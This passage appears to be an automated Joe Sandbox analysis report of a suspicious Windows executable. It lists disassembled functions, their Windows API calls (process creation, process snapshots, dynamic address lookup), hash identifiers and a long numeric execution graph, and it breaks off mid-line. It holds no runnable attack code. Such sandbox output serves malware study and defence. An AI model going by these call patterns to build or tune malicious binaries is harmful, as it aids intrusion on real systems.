                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                    • String ID:
                                                    • API String ID: 2883127279-0
                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                    APIs
                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringlstrcmp
                                                    • String ID: !N~
                                                    • API String ID: 623250636-529124213
                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                    APIs
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                    Strings
                                                    • Error launching installer, xrefs: 00405C48
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: Error launching installer
                                                    • API String ID: 3712363035-66219284
                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                    APIs
                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                    • API String ID: 3509786178-2769509956
                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                    Execution Graph

                                                    Execution Coverage:4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:99
                                                    execution_graph 98353 f2e463 98354 ef373a 59 API calls 98353->98354 98355 f2e479 98354->98355 98356 f2e4fa 98355->98356 98357 f2e48f 98355->98357 98365 efb020 98356->98365 98407 ef5376 60 API calls 98357->98407 98360 f2e4ce 98364 f2e4ee Mailbox 98360->98364 98408 f5890a 59 API calls Mailbox 98360->98408 98362 f2f046 Mailbox 98364->98362 98409 f5a48d 89 API calls 4 library calls 98364->98409 98410 f03740 98365->98410 98367 f330b6 98506 f5a48d 89 API calls 4 library calls 98367->98506 98370 efb07f 98370->98367 98371 f330d4 98370->98371 98389 efbb86 98370->98389 98404 efb132 Mailbox _memmove 98370->98404 98507 f5a48d 89 API calls 4 library calls 98371->98507 98373 f3355e 98386 efb4dd 98373->98386 98518 f5a48d 89 API calls 4 library calls 98373->98518 98374 f3318a 98374->98386 98509 f5a48d 89 API calls 4 library calls 98374->98509 98379 f33106 98379->98374 98508 efa9de 299 API calls 98379->98508 98382 ef53b0 299 API calls 98382->98404 98383 ef3b31 59 API calls 98383->98404 98384 f4730a 59 API calls 98384->98404 98385 f10fe6 59 API calls Mailbox 98385->98404 98386->98364 98505 f5a48d 89 API calls 4 library calls 98389->98505 98390 f33418 98391 ef53b0 299 API calls 98390->98391 98393 f33448 98391->98393 98393->98386 98398 ef39be 68 API calls 98393->98398 98396 f331c3 98510 f5a48d 89 API calls 4 library calls 98396->98510 98397 ef3c30 68 API calls 98397->98404 98399 f3346f 98398->98399 98516 f5a48d 89 API calls 4 library calls 98399->98516 98402 ef523c 59 API calls 98402->98404 98404->98373 98404->98379 98404->98382 98404->98383 98404->98384 98404->98385 98404->98386 98404->98389 98404->98390 98404->98396 98404->98397 98404->98399 98404->98402 98405 f01c9c 59 API calls 98404->98405 98415 ef3add 98404->98415 98422 efbc70 98404->98422 98503 ef3a40 59 API calls Mailbox 98404->98503 98504 ef5190 59 API calls Mailbox 98404->98504 98511 f46c62 59 API calls 2 library calls 98404->98511 98512 f6a9c3 85 API calls Mailbox 98404->98512 98513 f46c1e 59 API calls Mailbox 98404->98513 98514 f55ef2 68 API calls 98404->98514 98515 ef3ea3 68 API calls Mailbox 98404->98515 98517 f5a12a 59 API calls 98404->98517 98405->98404 98407->98360 98408->98364 98409->98362 98411 f0374f 98410->98411 98414 f0376a 98410->98414 98412 f01aa4 59 API calls 98411->98412 98413 f03757 CharUpperBuffW 98412->98413 98413->98414 98414->98370 98416 ef3aee 98415->98416 98417 f2d3cd 98415->98417 98418 f10fe6 Mailbox 59 API calls 98416->98418 98419 ef3af5 98418->98419 98420 ef3b16 98419->98420 98519 ef3ba5 59 API calls Mailbox 98419->98519 98420->98404 98423 f3359f 98422->98423 98434 efbc95 98422->98434 98637 f5a48d 89 API calls 4 library calls 98423->98637 98425 efbf3b 98425->98404 98429 efc2b6 98429->98425 98430 efc2c3 98429->98430 98635 efc483 299 API calls Mailbox 98430->98635 98433 efc2ca LockWindowUpdate DestroyWindow GetMessageW 98433->98425 98435 efc2fc 98433->98435 98496 efbca5 Mailbox 98434->98496 98638 ef5376 60 API calls 98434->98638 98639 f4700c 299 API calls 98434->98639 98436 f34509 TranslateMessage DispatchMessageW GetMessageW 98435->98436 98436->98436 98438 f34539 98436->98438 98437 f336b3 Sleep 98437->98496 98438->98425 98439 f10fe6 59 API calls Mailbox 98439->98496 98440 efbf54 timeGetTime 98440->98496 98442 f3405d WaitForSingleObject 98443 f3407d GetExitCodeProcess CloseHandle 98442->98443 98442->98496 98450 efc36b 98443->98450 98444 f01c9c 59 API calls 98444->98496 98445 f01207 59 API calls 98476 efc1fa Mailbox 98445->98476 98446 efc210 Sleep 98446->98476 98447 f343a9 Sleep 98447->98476 98450->98404 98451 efc324 timeGetTime 98636 ef5376 60 API calls 98451->98636 98452 f1083e timeGetTime 98452->98476 98455 f34440 GetExitCodeProcess 98459 f34456 WaitForSingleObject 98455->98459 98460 f3446c CloseHandle 98455->98460 98457 ef6d79 109 API calls 98457->98496 98459->98460 98459->98496 98460->98476 98461 ef6cd8 277 API calls 98461->98496 98462 f76562 110 API calls 98462->98476 98464 ef5376 60 API calls 98464->98496 98465 f338aa Sleep 98465->98496 98466 f344c8 Sleep 98466->98496 98467 f01a36 59 API calls 98467->98476 98473 efc26d 98478 f01a36 59 API calls 98473->98478 98474 efb020 277 API calls 98474->98496 98476->98445 98476->98446 98476->98450 98476->98452 98476->98455 98476->98462 98476->98465 98476->98466 98476->98467 98476->98496 98664 f52baf 60 API calls 98476->98664 98665 ef5376 60 API calls 98476->98665 98666 ef3ea3 68 API calls Mailbox 98476->98666 98667 ef6cd8 299 API calls 98476->98667 98708 f470e2 59 API calls 98476->98708 98709 f557ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98476->98709 98710 f54148 CreateToolhelp32Snapshot Process32FirstW 98476->98710 98480 efbf25 Mailbox 98478->98480 98480->98425 98634 efc460 10 API calls Mailbox 98480->98634 98482 ef39be 68 API calls 98482->98496 98484 ef5190 59 API calls Mailbox 98484->98496 98485 ef53b0 277 API calls 98485->98496 98487 f5a48d 89 API calls 98487->98496 98488 f46cf1 59 API calls Mailbox 98488->98496 98489 f33e13 VariantClear 98489->98496 98490 f47aad 59 API calls 98490->98496 98491 f33ea9 VariantClear 98491->98496 98492 f33c57 VariantClear 98492->98496 98493 ef41c4 59 API calls Mailbox 98493->98496 98494 f01a36 59 API calls 98494->98496 98495 ef3ea3 68 API calls 98495->98496 98496->98437 98496->98439 98496->98440 98496->98442 98496->98444 98496->98446 98496->98447 98496->98450 98496->98451 98496->98457 98496->98461 98496->98464 98496->98473 98496->98474 98496->98476 98496->98480 98496->98482 98496->98484 98496->98485 98496->98487 98496->98488 98496->98489 98496->98490 98496->98491 98496->98492 98496->98493 98496->98494 98496->98495 98520 ef52b0 98496->98520 98529 ef9a00 98496->98529 98536 ef9c80 98496->98536 98567 efa820 98496->98567 98584 f5bcd6 98496->98584 98614 f5e4a0 98496->98614 98617 f5412a 98496->98617 98620 f6e60c 98496->98620 98623 f5c270 98496->98623 98630 f042cf 98496->98630 98640 f76655 59 API calls 98496->98640 98641 f5a058 59 API calls Mailbox 98496->98641 98642 f4e0aa 59 API calls 98496->98642 98643 ef4d37 98496->98643 98661 f46c62 59 API calls 2 library calls 98496->98661 98662 ef38ff 59 API calls 98496->98662 98663 ef3a40 59 API calls Mailbox 98496->98663 98668 f6c355 98496->98668 98503->98404 98504->98404 98505->98367 98506->98386 98507->98386 98508->98374 98509->98386 98510->98386 98511->98404 98512->98404 98513->98404 98514->98404 98515->98404 98516->98386 98517->98404 98518->98386 98519->98420 98521 ef52c6 98520->98521 98528 ef5313 98520->98528 98522 ef52d3 PeekMessageW 98521->98522 98521->98528 98523 ef52ec 98522->98523 98522->98528 98523->98496 98525 f2df68 TranslateAcceleratorW 98526 ef533e PeekMessageW 98525->98526 98525->98528 98526->98523 98526->98528 98527 ef5352 TranslateMessage DispatchMessageW 98527->98526 98528->98523 98528->98525 98528->98526 98528->98527 98720 ef359e 98528->98720 98530 ef9a1d 98529->98530 98532 ef9a31 98529->98532 98725 ef94e0 98530->98725 98759 f5a48d 89 API calls 4 library calls 98532->98759 98534 ef9a28 98534->98496 98535 f32478 98535->98535 98537 ef9cb5 98536->98537 98538 f3247d 98537->98538 98541 ef9d1f 98537->98541 98550 ef9d79 98537->98550 98539 ef53b0 299 API calls 98538->98539 98540 f32492 98539->98540 98566 ef9f50 Mailbox 98540->98566 98769 f5a48d 89 API calls 4 library calls 98540->98769 98544 f01207 59 API calls 98541->98544 98541->98550 98542 f01207 59 API calls 98542->98550 98546 f324d8 98544->98546 98545 f12f70 __cinit 67 API calls 98545->98550 98548 f12f70 __cinit 67 API calls 98546->98548 98547 f324fa 98547->98496 98548->98550 98549 ef39be 68 API calls 98549->98566 98550->98542 98550->98545 98550->98547 98553 ef9f3a 98550->98553 98550->98566 98551 ef53b0 299 API calls 98551->98566 98553->98566 98770 f5a48d 89 API calls 4 library calls 98553->98770 98554 ef4230 59 API calls 98554->98566 98557 efa058 98557->98496 98559 f327f9 98559->98496 98560 efa775 98774 f5a48d 89 API calls 4 library calls 98560->98774 98563 f5a48d 89 API calls 98563->98566 98566->98549 98566->98551 98566->98554 98566->98557 98566->98560 98566->98563 98768 f01bcc 59 API calls 2 library calls 98566->98768 98771 f47aad 59 API calls 98566->98771 98772 f6ccac 299 API calls 98566->98772 98773 f6bc26 299 API calls Mailbox 98566->98773 98775 ef5190 59 API calls Mailbox 98566->98775 98776 f69ab0 299 API calls Mailbox 98566->98776 98568 f32d51 98567->98568 98571 efa84c 98567->98571 98778 f5a48d 89 API calls 4 library calls 98568->98778 98570 f32d62 98570->98496 98572 f32d6a 98571->98572 98580 efa888 _memmove 98571->98580 98779 f5a48d 89 API calls 4 library calls 98572->98779 98575 f10fe6 59 API calls Mailbox 98575->98580 98576 f32dae 98780 efa9de 299 API calls 98576->98780 98578 ef53b0 299 API calls 98578->98580 98579 f32dc8 98581 efa975 98579->98581 98781 f5a48d 89 API calls 4 library calls 98579->98781 98580->98575 98580->98576 98580->98578 98580->98579 98580->98581 98582 efa962 98580->98582 98581->98496 98582->98581 98777 f6a9c3 85 API calls Mailbox 98582->98777 98585 f5bcf5 98584->98585 98586 f5bdbb Mailbox 98584->98586 98782 ef502b 98585->98782 98588 ef4d37 84 API calls 98586->98588 98613 f5bdc3 Mailbox 98586->98613 98590 f5bdf3 98588->98590 98589 f5bd00 98592 ef502b 59 API calls 98589->98592 98591 ef4d37 84 API calls 98590->98591 98593 f5be05 98591->98593 98595 f5bd14 98592->98595 98849 f53ce2 98593->98849 98595->98586 98596 f01207 59 API calls 98595->98596 98597 f5bd25 98596->98597 98598 f01207 59 API calls 98597->98598 98599 f5bd2e 98598->98599 98600 ef4d37 84 API calls 98599->98600 98601 f5bd3b 98600->98601 98786 f10119 98601->98786 98603 f5bd4e 98604 f017e0 59 API calls 98603->98604 98605 f5bd5f 98604->98605 98606 f5412a 3 API calls 98605->98606 98612 f5bd88 Mailbox 98605->98612 98608 f5bd6e 98606->98608 98607 ef502b 59 API calls 98607->98586 98609 f01a36 59 API calls 98608->98609 98608->98612 98610 f5bd7f 98609->98610 98837 f53f1d 98610->98837 98612->98607 98613->98496 99025 f5f87d 98614->99025 98616 f5e4b0 98616->98496 99156 f5494a GetFileAttributesW 98617->99156 99160 f6d1c6 98620->99160 98622 f6e61c 98622->98496 98624 ef4d37 84 API calls 98623->98624 98625 f5c286 98624->98625 99270 f54005 98625->99270 98627 f5c28e 98628 f5c292 GetLastError 98627->98628 98629 f5c2a7 98627->98629 98628->98629 98629->98496 98631 f042e8 98630->98631 98632 f042d9 98630->98632 98631->98632 98633 f042ed CloseHandle 98631->98633 98632->98496 98633->98632 98634->98429 98635->98433 98636->98496 98637->98434 98638->98434 98639->98434 98640->98496 98641->98496 98642->98496 98644 ef4d51 98643->98644 98655 ef4d4b 98643->98655 98645 f2db28 __i64tow 98644->98645 98646 ef4d99 98644->98646 98647 ef4d57 __itow 98644->98647 98651 f2da2f 98644->98651 99294 f138c8 83 API calls 3 library calls 98646->99294 98650 f10fe6 Mailbox 59 API calls 98647->98650 98652 ef4d71 98650->98652 98653 f10fe6 Mailbox 59 API calls 98651->98653 98659 f2daa7 Mailbox _wcscpy 98651->98659 98654 f01a36 59 API calls 98652->98654 98652->98655 98656 f2da74 98653->98656 98654->98655 98655->98496 98657 f10fe6 Mailbox 59 API calls 98656->98657 98658 f2da9a 98657->98658 98658->98659 98660 f01a36 59 API calls 98658->98660 99295 f138c8 83 API calls 3 library calls 98659->99295 98660->98659 98661->98496 98662->98496 98663->98496 98664->98476 98665->98476 98666->98476 98667->98476 98669 f6c380 98668->98669 98670 f6c39a 98668->98670 99323 f5a48d 89 API calls 4 library calls 98669->99323 99296 f6a8fd 98670->99296 98674 ef53b0 298 API calls 98675 f6c406 98674->98675 98676 f6c392 Mailbox 98675->98676 98677 f6c498 98675->98677 98679 f6c447 98675->98679 98676->98496 98678 f6c49e 98677->98678 98680 f6c4ee 98677->98680 99324 f57ed5 59 API calls 98678->99324 98686 f5789a 59 API calls 98679->98686 98680->98676 98681 ef4d37 84 API calls 98680->98681 98683 f6c500 98681->98683 98684 f01aa4 59 API calls 98683->98684 98687 f6c524 CharUpperBuffW 98684->98687 98685 f6c4c1 99325 f035b9 59 API calls Mailbox 98685->99325 98689 f6c477 98686->98689 98692 f6c53e 98687->98692 98691 f46ebc 298 API calls 98689->98691 98690 f6c4c9 Mailbox 98695 efb020 298 API calls 98690->98695 98691->98676 98693 f6c545 98692->98693 98694 f6c591 98692->98694 99303 f5789a 98693->99303 98696 ef4d37 84 API calls 98694->98696 98695->98676 98697 f6c599 98696->98697 99326 ef5376 60 API calls 98697->99326 98702 f6c5a3 98702->98676 98703 ef4d37 84 API calls 98702->98703 98704 f6c5be 98703->98704 99327 f035b9 59 API calls Mailbox 98704->99327 98706 f6c5ce 98707 efb020 298 API calls 98706->98707 98707->98676 98708->98476 98709->98476 99354 f54ce2 98710->99354 98712 f54195 Process32NextW 98713 f54244 CloseHandle 98712->98713 98719 f5418e Mailbox 98712->98719 98713->98476 98714 f01207 59 API calls 98714->98719 98715 f01a36 59 API calls 98715->98719 98716 f10119 59 API calls 98716->98719 98717 f017e0 59 API calls 98717->98719 98718 f0151f 61 API calls 98718->98719 98719->98712 98719->98713 98719->98714 98719->98715 98719->98716 98719->98717 98719->98718 98721 ef35e2 98720->98721 98723 ef35b0 98720->98723 98721->98528 98722 ef35d5 IsDialogMessageW 98722->98721 98722->98723 98723->98721 98723->98722 98724 f2d273 GetClassLongW 98723->98724 98724->98722 98724->98723 98726 ef53b0 299 API calls 98725->98726 98727 ef951f 98726->98727 98728 f32001 98727->98728 98742 ef9527 _memmove 98727->98742 98761 ef5190 59 API calls Mailbox 98728->98761 98730 f322c0 98767 f5a48d 89 API calls 4 library calls 98730->98767 98732 f322de 98732->98732 98733 ef9583 98733->98534 98734 ef9944 98737 f10fe6 Mailbox 59 API calls 98734->98737 98735 f10fe6 59 API calls Mailbox 98735->98742 98736 ef986a 98738 ef987f 98736->98738 98739 f322b1 98736->98739 98749 ef96e3 _memmove 98737->98749 98741 f10fe6 Mailbox 59 API calls 98738->98741 98766 f6a983 59 API calls 98739->98766 98752 ef977d 98741->98752 98742->98730 98742->98733 98742->98734 98742->98735 98743 ef96cf 98742->98743 98757 ef9741 98742->98757 98743->98734 98745 ef96dc 98743->98745 98744 f10fe6 Mailbox 59 API calls 98748 ef970e 98744->98748 98747 f10fe6 Mailbox 59 API calls 98745->98747 98746 f322a0 98765 f5a48d 89 API calls 4 library calls 98746->98765 98747->98749 98748->98757 98760 efcca0 299 API calls 98748->98760 98749->98744 98749->98748 98749->98757 98752->98534 98754 f32278 98764 f5a48d 89 API calls 4 library calls 98754->98764 98756 f32253 98763 f5a48d 89 API calls 4 library calls 98756->98763 98757->98736 98757->98746 98757->98752 98757->98754 98757->98756 98762 ef8180 299 API calls 98757->98762 98759->98535 98760->98757 98761->98734 98762->98757 98763->98752 98764->98752 98765->98752 98766->98730 98767->98732 98768->98566 98769->98566 98770->98566 98771->98566 98772->98566 98773->98566 98774->98559 98775->98566 98776->98566 98777->98581 98778->98570 98779->98581 98780->98579 98781->98581 98783 ef5041 98782->98783 98784 ef503c 98782->98784 98783->98589 98784->98783 98895 f137ba 59 API calls 98784->98895 98787 f01207 59 API calls 98786->98787 98788 f1012f 98787->98788 98789 f01207 59 API calls 98788->98789 98790 f10137 98789->98790 98791 f01207 59 API calls 98790->98791 98792 f1013f 98791->98792 98793 f01207 59 API calls 98792->98793 98794 f10147 98793->98794 98795 f4627d 98794->98795 98796 f1017b 98794->98796 98797 f01c9c 59 API calls 98795->98797 98798 f01462 59 API calls 98796->98798 98799 f46286 98797->98799 98800 f10189 98798->98800 98912 f019e1 98799->98912 98802 f01981 59 API calls 98800->98802 98803 f10193 98802->98803 98804 f101be 98803->98804 98805 f01462 59 API calls 98803->98805 98806 f101fe 98804->98806 98807 f101dd 98804->98807 98819 f462a6 98804->98819 98808 f101b4 98805->98808 98896 f01462 98806->98896 98909 f01609 98807->98909 98812 f01981 59 API calls 98808->98812 98810 f1020f 98814 f10221 98810->98814 98817 f01c9c 59 API calls 98810->98817 98811 f46376 98815 f01821 59 API calls 98811->98815 98812->98804 98818 f10231 98814->98818 98820 f01c9c 59 API calls 98814->98820 98826 f46333 98815->98826 98817->98814 98822 f10238 98818->98822 98824 f01c9c 59 API calls 98818->98824 98819->98811 98821 f4635f 98819->98821 98834 f462dd 98819->98834 98820->98818 98821->98811 98829 f4634a 98821->98829 98825 f01c9c 59 API calls 98822->98825 98827 f1023f Mailbox 98822->98827 98823 f01462 59 API calls 98823->98806 98824->98822 98825->98827 98826->98806 98828 f01609 59 API calls 98826->98828 98916 f0153b 59 API calls 2 library calls 98826->98916 98827->98603 98828->98826 98832 f01821 59 API calls 98829->98832 98830 f4633b 98831 f01821 59 API calls 98830->98831 98831->98826 98832->98826 98834->98830 98835 f46326 98834->98835 98836 f01821 59 API calls 98835->98836 98836->98826 98918 f0133d 98837->98918 98840 f53f66 GetLastError 98841 f53f73 CreateDirectoryW 98840->98841 98842 f53f81 98840->98842 98841->98842 98843 f53f7f Mailbox 98841->98843 98842->98843 98844 f01981 59 API calls 98842->98844 98843->98612 98845 f53fc3 98844->98845 98846 f53f1d 59 API calls 98845->98846 98847 f53fcc 98846->98847 98847->98843 98848 f53fd0 CreateDirectoryW 98847->98848 98848->98843 98850 f01207 59 API calls 98849->98850 98851 f53cff 98850->98851 98852 f01207 59 API calls 98851->98852 98853 f53d07 98852->98853 98854 f01207 59 API calls 98853->98854 98855 f53d0f 98854->98855 98856 f01207 59 API calls 98855->98856 98857 f53d17 98856->98857 98922 f10284 98857->98922 98860 f10284 60 API calls 98861 f53d2b 98860->98861 98932 f54f82 98861->98932 98863 f53d36 98943 f54fec GetFileAttributesW 98863->98943 98866 f53d53 98868 f54fec GetFileAttributesW 98866->98868 98867 f01900 59 API calls 98867->98866 98869 f53d5b 98868->98869 98870 f53d68 98869->98870 98871 f01900 59 API calls 98869->98871 98872 f01207 59 API calls 98870->98872 98871->98870 98873 f53d70 98872->98873 98874 f01207 59 API calls 98873->98874 98875 f53d78 98874->98875 98876 f10119 59 API calls 98875->98876 98877 f53d89 FindFirstFileW 98876->98877 98878 f53eb4 FindClose 98877->98878 98883 